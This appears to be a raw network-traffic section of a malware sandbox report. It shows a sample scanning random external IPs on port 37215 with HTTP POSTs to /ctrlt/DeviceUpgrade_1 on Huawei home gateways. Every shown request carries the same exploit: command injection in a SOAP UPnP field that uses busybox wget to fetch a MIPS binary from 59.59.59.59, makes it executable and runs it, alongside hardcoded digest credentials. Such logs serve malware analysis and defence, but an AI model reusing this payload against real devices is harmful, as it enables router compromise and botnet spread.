2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          975192.168.2.1552452157.81.186.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.721997023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          976192.168.2.1542862157.17.252.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.722091913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          977192.168.2.153380241.36.111.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.722091913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          978192.168.2.1553336197.207.238.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.722156048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          979192.168.2.1543228197.236.2.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.723361969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          980192.168.2.1555726157.145.205.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.723361969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          981192.168.2.1551834197.190.32.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.724756002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          982192.168.2.1535280197.159.78.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.725033045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          983192.168.2.1548906145.68.220.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.673228979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          984192.168.2.1559882169.1.59.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.691626072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          985192.168.2.154479641.100.145.20637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.691636086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
